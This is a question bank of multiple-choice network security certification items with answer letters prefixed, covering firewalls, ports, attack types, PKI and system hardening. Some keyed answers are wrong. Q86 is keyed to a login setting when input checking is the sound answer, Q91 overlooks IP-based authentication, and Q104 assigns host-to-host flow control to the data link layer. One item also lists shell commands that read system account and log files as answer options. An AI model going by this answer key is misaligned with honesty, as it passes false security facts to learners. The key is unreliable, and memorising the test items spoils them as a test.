D#CIW Q81. Which one of the following choices lists the two greatest security problems associated with HTTP?	^A: Community names and encrypted passwords	^B: IP spoofing and ICMP spoofing	^C: Viewer applications and external programs used by the HTTP server	^D: No bound checking on arrays and anonymous access
B#CIW Q82. Which tool utilizes a database of known security problems to test a network?	^A: Operating system add-on	^B: Network scanner	^C: Logging and log analysis tool	^D: SNMP
B#CIW Q83. How are servers able to conduct a simple authentication check using DNS?	^A: Forward DNS lookup	^B: Reverse DNS lookup	^C: RARP	^D: Nslookup
B#CIW Q84. Which port or ports are used for SMTP?	^A: 20 and 21	^B: 25	^C: 53	^D: 161 and 162
A#CIW Q85. When using IIS, what has primary control over security?	^A: The operating system	^B: IIS	^C: The GINA	^D: The SSL Service
B#CIW Q86. Which of the following is the best way to secure CGI scripts?	^A: Configure the firewall to filter CGI at ports 80 and 443	^B: Disable anonymous HTTP logins when using CGI	^C: Ensure that the code checks all user input	^D: Active Java on the primary web server
B#CIW Q87. Which type of gateway functions in all layers of the OSI/RM?	^A: A circuit-level gateway	^B: An application-level gateway	^C: A proxy gateway	^D: A universal gateway
A#CIW Q88. Which device is similar to a packet filter, but also provides network address translation?	^A: A circuit-level gateway	^B: An application-level gateway	^C: A proxy server	^D: A choke router
B#CIW Q89. Which of the following attacks specifically utilizes packet spoofing?	^A: Crack	^B: Smurf	^C: Flood	^D: Worm
B#CIW Q90. Tavo wants to check the status of failed Telnet-based login attempts on a Linux machine he administers. Which shell command can he use to see only that information?	^A: cat /etc/passwd > newfile.txt	^B: grep login /var/log/messages	^C: more /var/log/secure	^D: more /etc/passwd
A#CIW Q91. Why is the rlogin command dangerous to network security?	^A: Remote logins are a security threat regardless of the protocol and should be avoided	^B: There is no way to prevent the user from becoming root if he successfully uses rlogin	^C: The rlogin command has a history of buffer overflows that has not been corrected	^D: The rlogin command relies on IP-based authentication, which is easily defeated
C#CIW Q92. Which of the following is the most desirable goal that UNIX system crackers typically hope to achieve?	^A: To be able to write a message on the compromised computer's web page	^B: To be able to plant a virus that will wipe out the entire database	^C: To gain root privileges	^D: To alter the /var/log/messages file and thus escape detection
A#CIW Q93. What is the purpose of blocking services on any given server?	^A: To limit the number of targets a cracker can choose from	^B: To limit the number of processes that run at any given time, enhancing response time in case of a security breach	^C: To keep the operating system and its processes as simple as possible so administration is easier	^D: None; most services are needed and pose only minor security threats
B#CIW Q94. What is the primary function of IPSec?	^A: It thwarts denial-of-service attacks	^B: It provides encryption	^C: It authenticates users	^D: It provides access control
A#CIW Q95. When setting up Microsoft Internet Information Server (IIS) in either Windows NT or Windows 2000, what should you change to help provide security?	^A: The default accounts must be renamed because they pose a security problem	^B: The domain controller must be queried for the default encryption for the user database	^C: The administrator must import default admin profiles for secure administration rights	^D: The default users must be trained in the errata and security features of internet information manager
B#CIW Q96. Helga is going to log on to her network. Her network does not employ traffic padding mechanisms. Why will it be easy for someone to steal her password?	^A: Because her password could be more than two weeks old	^B: Because of the predictability of the login length and password prompts	^C: Because the cleartext user name and password are not encrypted	^D: Because there is no provision for log analysis without traffic padding, thus no accountability when passwords are lost
B#CIW Q97. Why would a Windows NT/2000 administrator place the operating system, the program files and the data on different, discrete directories?	^A: To avoid confusion and duplication of upgrades between applications and the operating system	^B: To enhance security by modifying permissions for each resource as needed	^C: To restrict users from accidentally overwriting critical files (if they fill their home directories to capacity), which makes the operating system vulnerable to hacker attacks	^D: To keep the operating system partition from becoming overwhelmed with user program libraries and DLLs
D#CIW Q98. Which layer of the OSI/RM do proxy servers usually address?	^A: Physical layer	^B: Network layer	^C: Transport layer	^D: Application layer 
C#CIW Q99. At which layer of the OSI/RM do packet filters function?	^A: Data link layer	^B: Physical layer	^C: Network layer	^D: Transport layer
B#CIW Q100. Helga deleted extraneous services from a system to ensure that it is relatively secure from attack. Which term best describes this activity?	^A: Securing the system	^B: Operating system hardening	^C: Auditing	^D: System maintenance
C#CIW Q101. Lucy is a system administrator who wants to block all NNTP traffic between her network and the Internet. How should she configure her firewall?	^A: Configure the firewall to block all incoming and outgoing packets except for those with the source and destination port of 119. Then, allow all traffic with destination ports above 1024 to traverse the firewall.	^B: Configure the firewall to block all incoming packets with the source port of 119, and outgoing packets with a source port lower than 1024. Then, block all packets with the destination port of 119 and with a source port lower than 1024.	^C: Configure the firewall to block incoming packets with the destination port of 119, and to block outgoing packets with the destination port of 119.	^D: Configure the firewall to block all incoming packets with the source port of 119.
B#CIW Q102. Which port is used by HTTP to listen for secure connections?	^A: UDP 80	^B: TCP 443	^C: TCP 8080	^D: UDP 8080
B#CIW Q103. Raul is worried that his network might be attacked through modified ICMP messages. What can he do to prevent this?	^A: Disable anonymous logins	^B: Filter ICMP packets at the firewall	^C: Configure the firewall to block zone transfers	^D: Scan ICMP messages for viruses at the firewall
A#CIW Q104. Which layer of the OSI/RM stack controls the flow of information between hosts?	^A: Data link layer	^B: Physical layer	^C: Network layer	^D: Transport layer
D#CIW Q105. What is the most important step in securing a web server?	^A: Logging all HTTP activity	^B: Enabling system-wide encryption	^C: Placing the operating system, web server program, and server files on the same partition	^D: Placing the operating system, web server program, and server files on separate partitions
D#CIW Q106. You have enabled Tripwire on your Linux system. Which location is best for storing the database file?	^A: On a CD-RW drive attached to the system	^B: In the default location	^C: On a write-protected floppy disk attached to the system	^D: On a CD-R drive attached to the system
D#CIW Q107. After installing a Linux server and activating SSH on it, you try to authenticate, but are rejected due to an authentication failure. You have properly transferred host and public keys, and all of your servers use the same flavor of SSH (OpenSSH). What is a likely cause for your failure to connect to this newly configured server?	^A: The version of SSH you are using is incompatible with your Linux system	^B: You must first conduct a Telnet session with the server	^C: You must first disable Telnet and rlogin for SSH to work properly	^D: Your name resolution is incorrectly configured
B#CIW Q108. What is another term for a network security manager who acts as a potential hacker (a person looking for security loopholes)?	^A: An agent	^B: An auditor	^C: An assessor	^D: An analyzer
A#CIW Q109. Helga is a systems administrator. She sees that an attacker from a remote location is sending invalid packets, trying to monopolize Helga's network connection so that a denial of service occurs. What characteristic of the activity makes Helga think this is a denial-of-service attack?	^A: Bandwidth consumption	^B: Hijacking of internal user resources	^C: Use of an illicit server	^D: System slowdown
A#CIW Q110. What is the most secure policy for a firewall?	^A: To reject all traffic unless it is explicitly permitted	^B: To accept all traffic unless it is explicitly rejected	^C: To enable all internal interfaces	^D: To enable all external interfaces
C#CIW Q111. Which of the following do hackers target because it usually communicates in cleartext, and because it often carries sensitive information?	^A: Router	^B: DNS server	^C: FTP server	^D: E-mail server
B#CIW Q112. What can a hacker destroy or modify to make a server or network intrusion undetectable?	^A: User accounts	^B: Log files	^C: Operating systems	^D: Passwords
D#CIW Q113. Which of the following targets is more vulnerable to hacking attacks because of its location in relation to the firewall?	^A: DNS server	^B: FTP server	^C: E-mail server	^D: Router
D#CIW Q114. Helga's web server is placed behind her corporate firewall. Currently, her firewall allows only VPN connections from other remote clients and networks. She wants to open the internet-facing interface on her firewall so that it allows all users on the Internet to access her web server. Which of the following must Helga's rule contain?	^A: Instructions allowing all UDP connections with a destination port of 80 and a source port of 1024	^B: Instructions allowing all UDP connections with a source port of 80 on the external interface and a destination port of 1024	^C: Instructions allowing all TCP connections with a source port of 80 on the internal interface and a destination port of 80	^D: Instructions allowing all TCP connections with a source port higher than 1024 and a destination port of 80
C#CIW Q115. When assessing the risk to a machine or network, what step should you take first?	^A: Analyzing, categorizing and prioritizing resources	^B: Evaluating the existing perimeter and internal security	^C: Checking for a written security policy	^D: Analyzing the use of existing management and control architecture
A#CIW Q116. Your company has suffered several denial-of-service attacks involving Microsoft Outlook e-mail clients. How can you protect your systems from such attacks in the future, yet still allow client users to accomplish their jobs?	^A: Install antivirus applications on the clients and the e-mail server	^B: Filter out all attachments from e-mail messages at the e-mail server	^C: Filter out all attachments from e-mail messages at the e-mail server, and install antivirus applications on the clients	^D: Install personal firewalls in the e-mail server and on each client
C#CIW Q117. Which type of device communicates with external servers on behalf of internal clients?	^A: A client-level gateway	^B: An application-level gateway	^C: A proxy server	^D: A packet filter
C#CIW Q118. Which choice lists the components that form security descriptors for Windows NT/2000 objects?	^A: The user name (UNAME), the password (PWD), and the object-owner security identifier (SID)	^B: The UNAME, the access profile of the object-owner SID, and confirmation by the system access control list (SACL)	^C: The object-owner SID, the discretionary access control list (DACL), the SACL, and the group SID	^D: The user name, the object identifier (OID), the set user identifier (UID), and the time/date stamp
D#CIW Q119. Which single service can you disable to stop approximately two-thirds of the exploration tools used against Windows NT/2000?	^A: The Schedule service.	^B: The POSIX subsystem with the C2Config tool.	^C: The Ansi.sys from the boot loader.	^D: The NetBIOS service.
C#CIW Q120. Which is included in the formula that Windows NT/2000 uses to create the Security Identifier?	^A: A semi-random number generated by the CPU based on the number of processes in the queue	^B: A set of numbers based on the serial number of the computer CPU and the serial number of Windows NT	^C: The computer name and the current amount of CPU time used by the user mode	^D: The octal encryption of the user name and the password
C#CIW Q121. A computer on your network is responding very slowly to network requests, and then it stops responding at all. You use a packet sniffer and create a filter that views packets being sent to that host. You see that the host is receiving thousands of ICMP packets a minute. What type of attack is causing the system to slow down?	^A: A spoofing attack	^B: A root kit installed on the system	^C: A denial-of-service attack	^D: A man-in-the-middle attack
C#CIW Q122. What is typically the most desirable asset for a hacker to obtain from a company or department?	^A: E-mail messages	^B: Router tables	^C: Database information	^D: DNS server records
A#CIW Q123. Which service, tool or command provides information about administrators, domain name servers, additional domains and physical locations?	^A: Whois	^B: Ping scanner	^C: Host	^D: Traceroute
A#CIW Q124. Your IDS application pages you at 3:00 a.m. and informs you that an attack occurred against your DNS server. You drive to the server site to investigate. You find no evidence of an attack, although the IDS application claims that a remote DNS server waged an attack on port 53 of your intranet DNS server. You check the logs and discover that a zone transfer has occurred. You check your zones and name resolution, and discover that all entries exist, and no unusual entries have been added to the database. What has most likely occurred?	^A: A DNS poisoning attack against your internal DNS server.	^B: A denial-of-service attack against your internal DNS server.	^C: A false positive generated by the IDS.	^D: A malfunction of the internal name server.
D#CIW Q125. Which of the following is a potential security risk when using CGI scripts?	^A: CGI scripts can contain viruses that can be used against your system.	^B: Compromised CGI scripts are often used in packet spoofing because they do not check packets that they generate.	^C: CGI scripts can create broadcast storms on the local network.	^D: Remote user input can be used to execute local commands.
B#CIW Q126. Which choice best defines the Windows NT Security Account Manager?	^A: The portion of the GINA.DLL that controls security	^B: The database containing the identities and credentials of users	^C: The name of the machine responsible for management of all security on the LAN	^D: The interface that is responsible for logging on and user IDs
A#CIW Q127. Lucy wants to ensure that her Windows NT Server 4.0 and Windows 2000 systems do not incur any unauthorized changes. What can she do to help secure her registry from changes?	^A: Lock the registry so that it cannot be written to by any application.	^B: Enable auditing.	^C: Back up the registry.	^D: Configure the registry so that it does not change.
A#CIW Q128. Andreas wants to choose a strong password for his computer. Which of the following should he include for his password?	^A: A mixture of uppercase and lowercase letters, symbols and numbers.	^B: An arcane phrase only he can remember.	^C: An incorrect spelling of a word or a phrase.	^D: A mixture of random words that form nonsense.
B#CIW Q129. What is the essential element in the implementation of any security plan?	^A: Testing to make sure any server-side scripts are secure	^B: Testing patch levels	^C: Proper firewall configuration	^D: Auditing
D#CIW Q130. A malicious user has connected to your system and learned the specifics of your operating system, including its current patch levels and the operating system name. What is the term for this type of scanning attack?	^A: SYN detection	^B: TCP priming	^C: Cache poisoning	^D: Stack fingerprinting
C#CIW Q131. Which type of attack causes a remote host to crash because it cannot respond to any new TCP connection requests?	^A: Crack attack	^B: Smurf attack	^C: SYN flood	^D: ICMP flood
B#CIW Q132. Tavo wants to improve the security on his FTP server. He is especially worried about password-sniffing attacks. Which of the following is the best action for Tavo to take?	^A: Disable anonymous logins.	^B: Allow only anonymous logins.	^C: Configure the firewall to block port 21.	^D: Place the FTP server outside of the firewall.
A#CIW Q133. Raul wants to know where to find encrypted passwords in a secured Linux server. Where is this information located on the hard drive?	^A: /etc/shadow	^B: /etc/passwd	^C: /secure/etc/shadow	^D: /etc/security/shadow
D#CIW Q134. In which risk assessment stage does the security auditor map the systems and resources on a network?	^A: Penetration	^B: Cancellation	^C: Activation	^D: Discovery
A#CIW Q135. You installed SSH on an older Linux server. You want to allow users to authenticate securely. Which choice lists two actions that must occur first?	^A: Public keys must first be exchanged to enable data encryption, and then the systems exchange host keys to enable authentication without passwords.	^B: The system must exchange host keys to enable data encryption, and individual users must exchange public keys to enable authentication without passwords.	^C: A key pair must be obtained from a CA to enable data encryption, then host keys must be exchanged to enable authentication.	^D: A key pair must be obtained from a CA to enable authentication, then host keys must be exchanged to enable data encryption.
C#CIW Q136. You want to secure your SMTP transmissions from sniffing attacks. How can you accomplish this?	^A: Forbid relaying.	^B: Enforce masquerading.	^C: Use an SSL certificate.	^D: Use strict bounds checking on arrays.
B#Compsec Q1. The best protection against the abuse of remote maintenance of a PBX (Private Branch Exchange) system is to: 	^A. Keep maintenance features turned off until needed 	^B. Insist on strong authentication before allowing remote maintenance 	^C. Keep PBX (Private Branch Exchange) in locked enclosure and restrict access to only a few people. 	^D. Check to see if the maintenance caller is on the list of approved maintenance personnel 
B#Compsec Q2. A high profile company has been receiving a high volume of attacks on their web site. ^  The network administrator wants to be able to collect information on the attacker(s) so legal action can be taken. ^   What should be implemented? 	^A. A DMZ (Demilitarized Zone) 	^B. A honey pot 	^C. A firewall 	^D. A new subnet 
A#Compsec Q3. The protection of data against unauthorized access or disclosure is an example of what? 	^A. Confidentiality 	^B. Integrity 	^C. Signing 	^D. Hashing 
D#Compsec Q4. You are running cabling for a network through a boiler room where the furnace and some other heavy machinery reside. You are concerned about interference from these sources. ^  Which of the following types of cabling provides the best protection from interference in this area? 	^A. STP 	^B. UTP 	^C. Coaxial 	^D. Fiber-optic 
B#Compsec Q5. In order for a user to obtain a certificate from a trusted CA (Certificate Authority), the user must present proof of identity and a: 	^A. Private key 	^B. Public key 	^C. Password 	^D. Kerberos key 
C#Compsec Q6. If a private key becomes compromised before its certificate's normal expiration, X.509 defines a method requiring each CA (Certificate Authority) to periodically issue a signed data structure called a certificate: 	^A. Enrollment list 	^B. Expiration list 	^C. Revocation list 	^D. Validation list 
D#Compsec Q7. An application that appears to perform a useful function but instead contains some sort of malicious code is called a _____. 	^A. Worm 	^B. SYN flood 	^C. Virus 	^D. Trojan Horse 	^E. Logic Bomb 
C#Compsec Q8. How many bits are employed when using hash encryption? 	^A. 32 	^B. 64 	^C. 128 	^D. 256 
A#Compsec Q9. What transport protocol and port number does SSH (Secure Shell) use? 	^A. TCP (Transmission Control Protocol) port 22 	^B. UDP (User Datagram Protocol) port 69 	^C. TCP (Transmission Control Protocol) port 179 	^D. UDP (User Datagram Protocol) port 17 
F#Compsec Q10. While performing a routine site audit of your wireless network, you discover an unauthorized Access Point placed on your network under the desk of Accounting department security. ^   When questioned, she denies any knowledge of it, but informs you that her new boyfriend has been to visit her several times, including taking her to lunch one time. ^  What type of attack have you just become a victim of? ^A. SYN Flood. 	^B. Distributed Denial of Service. 	^C. Man in the Middle attack. 	^D. TCP Flood. 	^E. IP Spoofing. 	^F. Social Engineering 	^G. Replay attack 	^H. Phone tag 	^I. Halloween attack 
D#Compsec Q11. When visiting an office adjacent to the server room, you discover the lock to the window is broken. ^   Because it is not your office you tell the resident of the office to contact the maintenance person and have it fixed. After leaving, you fail to follow up on whether the window was actually repaired. ^  What effect will this have on the likelihood of a threat associated with the vulnerability actually occurring? 	^A. If the window is repaired, the likelihood of the threat occurring will increase. 	^B. If the window is repaired, the likelihood of the threat occurring will remain constant. 	^C. If the window is not repaired, the likelihood of the threat occurring will decrease. 	^D. If the window is not repaired, the likelihood of the threat occurring will increase. 
B#Compsec Q12. Providing false information about the source of an attack is known as: 	^A. Aliasing 	^B. Spoofing 	^C. Flooding 	^D. Redirecting 
B#Compsec Q13. The start of the LDAP (Lightweight Directory Access Protocol) directory is called the: 	^A. Head 	^B. Root 	^C. Top 	^D. Tree 
B#Compsec Q15. You are explaining SSL to a junior administrator and come up to the topic of handshaking. How many steps are employed between the client and server in the SSL handshake process? 	^A. Five 	^B. Six 	^C. Seven 	^D. Eight 
C#Compsec Q16. An administrator notices that an e-mail server is currently relaying e-mail (including spam) for any e-mail server requesting relaying. ^  Upon further investigation the administrator notices the existence of /etc/mail/relay domains. ^   What modifications should the administrator make to the relay domains file to prevent relaying for non-explicitly named domains? 	^A. Move the .* entry to the bottom of the relay domains file and restart the e-mail process. 	^B. Move the .* entry to the top of the relay domains file and restart the e-mail process. 	^C. Delete the .* entry in the relay domains file and restart the e-mail process. 	^D. Delete the relay domains file from the /etc/mail folder and restart the e-mail process. 
B#Compsec Q17. Access control decisions are based on responsibilities that an individual user or process has in an organization. ^   This best describes: 	^A. MAC (Mandatory Access Control) 	^B. RBAC (Role Based Access Control) 	^C. DAC (Discretionary Access Control) 	^D. None of the above. 
A#Compsec Q18. A honey pot is _____. 	^A. A false system or network to attract attacks away from your real network. 	^B. A place to store passwords. 	^C. A safe haven for your backup media. 	^D. Something that exists only in theory. 
C#Compsec Q19. A problem with air conditioning is causing fluctuations in temperature in the server room. ^   The temperature is rising to 90 degrees when the air conditioner stops working, and then drops to 60 degrees when it starts working again. The problem keeps occurring over the next two days. ^  What problem may result from these fluctuations? (Select the best answer) 	^A. Electrostatic discharge 	^B. Power outages 	^C. Chip creep 	^D. Poor air quality 
D#Compsec Q20. You have been alerted to the possibility of someone using an application to capture and manipulate packets as they are passing through your network. ^   What type of threat does this represent? 	^A. DDoS 	^B. Back Door 	^C. Spoofing 	^D. Man in the Middle 
B#Compsec Q21. Which of the following media types is most immune to RF (Radio Frequency) eavesdropping?	^A. Coaxial cable	^B. Fiber optic cable	^C. Twisted pair wire 	^D. Unbounded 
A#Compsec Q22. What statement is most true about viruses and hoaxes? 	^A. Hoaxes can create as much damage as a real virus. 	^B. Hoaxes are harmless pranks and should be ignored. 	^C. Hoaxes can help educate users about a virus. 	^D. Hoaxes carry a malicious payload and can be destructive. 
E#Compsec Q24. A piece of malicious code that can replicate itself, has no productive purpose and exists only to damage computer systems or create further vulnerabilities is called a? 	^A. Logic Bomb 	^B. Worm 	^C. Trojan Horse 	^D. SYN flood 	^E. Virus 
B#Compsec Q25. When evidence is acquired, a log is started that records who had possession of the evidence for a specific amount of time. ^  This is to avoid allegations that the evidence may have been tampered with when it was unaccounted for, and to keep track of the tasks performed in acquiring evidence from a piece of equipment or materials. ^  What is the term used to describe this process? 	^A. Chain of command. 	^B. Chain of custody. 	^C. Chain of jurisdiction. 	^D. Chain of evidence. 
C#Compsec Q26. Data integrity is best achieved using a(n) 	^A. Asymmetric cipher 	^B. Digital certificate 	^C. Message digest 	^D. Symmetric cipher 
B#Compsec Q27. A recent audit shows that a user logged into a server with their user account and executed a program. ^  The user then performed activities only available to an administrator. ^ This is an example of what type of attack? 	^A. Trojan horse 	^B. Privilege escalation 	^C. Subseven back door 	^D. Security policy removal 
A#Compsec Q28. When a user clicks to browse a secure page, the SSL (Secure Sockets Layer) enabled server will first: 	^A. Use its digital certificate to establish its identity to the browser. 	^B. Validate the user by checking the CRL (Certificate Revocation List). 	^C. Request the user to produce the CRL (Certificate Revocation List). 	^D. Display the requested page on the browser, then provide its IP (Internet Protocol) address for verification 
D#Compsec Q29. You are assessing risks and determining which asset protection policies to create first. ^  Another member of the IT staff has provided you with a list of assets which have importance weighted on a scale of 1 to 10. Internet connectivity has an importance of 8, data has an importance of 9, personnel have an importance of 7, and software has an importance of 5. ^  Based on the weights, what is the order in which you will generate new policies? 	^A. Internet policy, data security, personnel safety policy, software policy. 	^B. Data security policy, Internet policy, software policy, personnel safety policy. 	^C. Software policy, personnel safety policy, Internet policy, data security policy. 	^D. Data security policy, Internet policy, personnel safety policy, software policy. 
C#Compsec Q30. Controlling access to information systems and associated networks is necessary for the preservation of their: 	^A. Authenticity, confidentiality, integrity and availability. 	^B. Integrity and availability. 	^C. Confidentiality, integrity and availability. 	^D. Authenticity, confidentiality and availability. 
A#Compsec Q31. What design feature of Instant Messaging makes it extremely insecure compared to other messaging systems? 	^A. It is a peer-to-peer network that offers most organizations virtually no control over it. 	^B. Most IM clients are actually Trojan Horses. 	^C. It is a centrally managed system that can be closely monitored. 	^D. It uses the insecure Internet as a transmission medium. 
D#Compsec Q32. Access controls that are created and administered by the data owner are considered: 	^A. MACs (Mandatory Access Control) 	^B. RBACs (Role Based Access Control) 	^C. LBACs (List Based Access Control) 	^D. DACs (Discretionary Access Control) 
D#Compsec Q33. A well defined business continuity plan must consist of risk and analysis, business impact analysis, strategic planning and mitigation, training and awareness, maintenance and audit and: 	^A. Security labeling and classification. 	^B. Budgeting and acceptance. 	^C. Documentation and security labeling. 	^D. Integration and validation. 
A#Compsec Q34. John wants to encrypt a sensitive message before sending it to one of his managers. Which type of encryption is often used for e-mail? 	^A. S/MIME 	^B. BIND 	^C. DES 	^D. SSL 
A#Compsec Q35. What is the greatest benefit to be gained through the use of S/MIME (Secure Multipurpose Internet Mail Extensions)? The ability to: 	^A. Encrypt and digitally sign e-mail messages. 	^B. Send anonymous e-mails. 	^C. Send e-mails with a return receipt. 	^D. Expedite the delivery of e-mail. 
B#Compsec Q36. A _____ occurs when a string of data is sent to a buffer that is larger than the buffer was designed to handle. 	^A. Brute Force attack	^B. Buffer overflow 	^C. Man in the middle attack 	^D. Blue Screen of Death 	^E. SYN flood 	^F. Spoofing attack 
C#Compsec Q37. Packet sniffing can be used to obtain username and password information in clear text from which one of the following? 	^A. SSH (Secure Shell) 	^B. SSL (Secure Sockets Layer) 	^C. FTP (File Transfer Protocol) 	^D. HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer) 
D#Compsec Q38. A company uses WEP (Wired Equivalent Privacy) for wireless security. Who may authenticate to the company's access point? 	^A. Only the administrator. 	^B. Anyone can authenticate. 	^C. Only users within the company. 	^D. Only users with the correct WEP (Wired Equivalent Privacy) key. 
B#Compsec Q39. As the Security Analyst for your company's network, you become aware that your systems may be under attack. ^  This kind of attack is a DOS attack and the exploit sends more traffic to a node than anticipated. What kind of attack is this? 	^A. Ping of death 	^B. Buffer Overflow 	^C. Logic Bomb 	^D. Smurf 
A#Compsec Q40. Following a disaster, while returning to the original site from an alternate site, the first process to resume at the original site would be the: 	^A. Least critical process 	^B. Most critical process. 	^C. Process most expensive to maintain at an alternate site. 	^D. Process that has a maximum visibility in the organization. 
B#Compsec Q41. In order to establish a secure connection between headquarters and a branch office over a public network, the router at each location should be configured to use IPSec (Internet Protocol Security) in ______ mode. 	^A. Secure 	^B. Tunnel 	^C. Transport 	^D. Data link 
B#Compsec Q42. The primary purpose of NAT (Network Address Translation) is to: 	^A. Translate IP (Internet Protocol) addresses into user friendly names. 	^B. Hide internal hosts from the public network. 	^C. Use one public IP (Internet Protocol) address on the internal network as a name server. 	^D. Hide the public network from internal hosts. 
C#Compsec Q43. Users of Instant Messaging clients are especially prone to what? 	^A. Theft of root user credentials. 	^B. Disconnection from the file server. 	^C. Hostile code delivered by file transfer. 	^D. Slow Internet connections. 	^E. Loss of email privileges. 	^F. Blue Screen of Death errors. 
A,B#Compsec Q44. Which two of the following are symmetric-key algorithms used for encryption? 	^A. Stream-cipher 	^B. Block 	^C. Public 	^D. Secret 
B#Compsec Q45. Computer forensics experts collect and analyze data using which of the following guidelines so as to minimize data loss? 	^A. Evidence 	^B. Chain of custody 	^C. Chain of command 	^D. Incident response 
C#Compsec Q46. A DMZ (Demilitarized Zone) typically contains: 	^A. A customer account database 	^B. Staff workstations 	^C. A FTP (File Transfer Protocol) server 	^D. A SQL (Structured Query Language) based database server 
B#Compsec Q47. What kind of attack is a type of security breach to a computer system that does not usually result in the theft of information or other security loss but the lack of legitimate use of that system? 	^A. CRL 	^B. DOS 	^C. ACL 	^D. MD2 
C#Compsec Q48. User A needs to send a private e-mail to User B. User A does not want anyone to have the ability to read the e-mail except for User B, thus retaining privacy. ^  Which tenet of information security is User A concerned about? 	^A. Authentication 	^B. Integrity 	^C. Confidentiality 	^D. Non-repudiation 
A#Compsec Q49. You are researching the ARO and need to find specific data that can be used for risk assessment. 	Which of the following will you use to find information? 	^A. Insurance companies 	^B. Stockbrokers 	^C. Manuals included with software and equipment. 	^D. None of the above. There is no way to accurately predict the ARO. 
A#Compsec Q50. Giving each user or group of users only the access they need to do their job is an example of which security principle? 	^A. Least privilege 	^B. Defense in depth 	^C. Separation of duties 	^D. Access control 
C#Compsec Q51. Documenting change levels and revision information is most useful for: 	^A. Theft tracking 	^B. Security audits 	^C. Disaster recovery 	^D. License enforcement 
A#Compsec Q52. One way to limit hostile sniffing on a LAN (Local Area Network) is by installing: 	^A. An ethernet switch. 	^B. An ethernet hub. 	^C. A CSU/DSU (Channel Service Unit/Data Service Unit). 	^D. A firewall. 
D#Compsec Q53. Notable security organizations often recommend only essential services be provided by a particular host, and any unnecessary services be disabled. Which of the following does NOT represent a reason supporting this recommendation? 	^A. Each additional service increases the risk of compromising the host, the services that run on the host, and potential clients of these services. 	^B. Different services may require different hardware, software, or a different discipline of administration. 	^C. When fewer services and applications are running on a specific host, fewer log entries and fewer interactions between different services are expected, which simplifies the analysis and maintenance of the system from a security point of view. 	^D. If a service is not using a well known port, firewalls will not be able to disable access to this port, and an administrator will not be able to restrict access to this service. 
B#Compsec Q54. Which of the following backup methods copies only modified files since the last full backup? 	^A. Full 	^B. Differential 	^C. Incremental 	^D. Archive 
B#Compsec Q55. You are compiling estimates on how much money the company could lose if a risk occurred one time in the future. Which of the following would these amounts represent? 	^A. ARO 	^B. SLE 	^C. ALE 	^D. Asset identification 
A#Compsec Q56. The term due care best relates to: 	^A. Policies and procedures intended to reduce the likelihood of damage or injury. 	^B. Scheduled activity in a comprehensive preventative maintenance program. 	^C. Techniques and methods for secure shipment of equipment and supplies. 	^D. User responsibilities involved when sharing passwords in a secure environment. 
B#Compsec Q57. Advanced Encryption Standard (AES) is an encryption algorithm for securing sensitive but unclassified material by U.S. Government agencies. ^  What type of encryption is it from the list below? 	^A. WTLS 	^B. Symmetric 	^C. Multifactor 	^D. Asymmetric 
A,B#Compsec Q58. You are the first person to respond to the scene of an incident involving a computer being hacked. ^  After determining the scope of the crime scene and securing it, you attempt to preserve evidence at the scene. ^  Which of the following tasks will you perform to preserve evidence? (Choose all that apply) 	^A. Photograph any information displayed on the monitors of computers involved in the incident. 	^B. Document any observation or messages displayed by the computer. 	^C. Shut down the computer to prevent further attacks that may modify data. 	^D. Gather up manuals, nonfunctioning devices, and other materials and equipment in the area so they are ready for transport. 
A#Compsec Q59. At what stage of an assessment would an auditor test systems for weaknesses and attempt to defeat existing encryption, passwords and access lists? 	^A. Penetration 	^B. Control 	^C. Audit planning 	^D. Discovery 
C#Compsec Q60. When examining the servers list of protocols that are bound and active on each network interface card, the network administrator notices a relatively large number of protocols. Which actions should be taken to ensure network security? 	^A. Unnecessary protocols do not pose a significant to the system and should be left intact for compatibility reasons. 	^B. There are no unneeded protocols on most systems because protocols are chosen during the installation. 	^C. Unnecessary protocols should be disable on all server and client machines on a network as they pose great risk. 	^D. Using port filtering ACLs (Access Control List) at firewalls and routers is sufficient to stop malicious attacks on unused protocols. 
B#Compsec Q61. Which of the following describes the concept of data integrity? 	^A. A means of determining what resources a user can use and view. 	^B. A method of security that ensures all data is sequenced, and numbered. 	^C. A means of minimizing vulnerabilities of assets and resources. 	^D. A mechanism applied to indicate a data's level of security. 
B#Compsec Q62. In a decentralized privilege management environment, user accounts and passwords are stored on: 	^A. One central authentication server. 	^B. Each individual server. 	^C. No more than two servers. 	^D. One server configured for decentralized management. 
A#Compsec Q63. In context of wireless networks, WEP (Wired Equivalent Privacy) was designed to: 	^A. Provide the same level of security as a wired LAN (Local Area Network). 	^B. Provide a collision preventive method of media access. 	^C. Provide a wider access area than that of wired LANs (Local Area Network). 	^D. Allow radio frequencies to penetrate walls. 
C,F#Compsec Q64. What two functions does IPSec perform? (Choose two) 	^A. Provides the Secure Shell (SSH) for data confidentiality. 	^B. Provides the Password Authentication Protocol (PAP) for user authentication. 	^C. Provides the Authentication Header (AH) for data integrity. 	^D. Provides the Internet Protocol (IP) for data integrity. 	^E. Provides the Nonrepudiation Header (NH) for identity integrity. 	^F. Provides the Encapsulation Security Payload (ESP) for data confidentiality. 
A#Compsec Q65. A primary drawback to using shared storage clustering for high availability and disaster recovery is: ^A. The creation of a single point of vulnerability. 	^B. The increased network latency between the host computers and the RAID (Redundant Array of Independent Disks) subsystem. ^C. The asynchronous writes which must be used to flush the server cache. 	^D. The highest storage capacity required by the RAID (Redundant Array of Independent Disks) subsystem. 
C#Compsec Q66. What are two common methods when using a public key infrastructure for maintaining access to servers in a network? 	^A. ACL and PGP. 	^B. PIM and CRL. 	^C. CRL and OCSP. 	^D. RSA and MD2 
C#Compsec Q67. After installing a new operating system, what configuration changes should be implemented? 	^A. Create application user accounts. 	^B. Rename the guest account. 	^C. Rename the administrator account, disable the guest accounts. 	^D. Create a secure administrator account. 
A#Compsec Q68. Users who configure their passwords using simple and meaningful things such as pet names or birthdays are subject to having their account used by an intruder after what type of attack? 	^A. Dictionary attack 	^B. Brute Force attack 	^C. Spoofing attack 	^D. Random guess attack 	^E. Man in the middle attack 	^F. Change list attack 	^G. Role Based Access Control attack 	^H. Replay attack	^I. Mickey Mouse attack
C#Compsec Q69. By definition, how many keys are needed to lock and unlock data using symmetric-key encryption? 	^A. 3+ 	^B. 2 	^C. 1 	^D. 0 
B#Compsec Q70. What kind of attack are hashed passwords vulnerable to? 	^A. Man in the middle. 	^B. Dictionary or brute force. 	^C. Reverse engineering. 	^D. DoS (Denial of Service) 
D#Compsec Q71. What is one advantage of the NTFS file system over the FAT16 and FAT32 file systems? 	^A. Integral support for streaming audio files. ^B. Integral support for UNIX compatibility. 	^C. Integral support for dual-booting with Red Hat Linux. 	^D. Integral support for file and folder level permissions. 
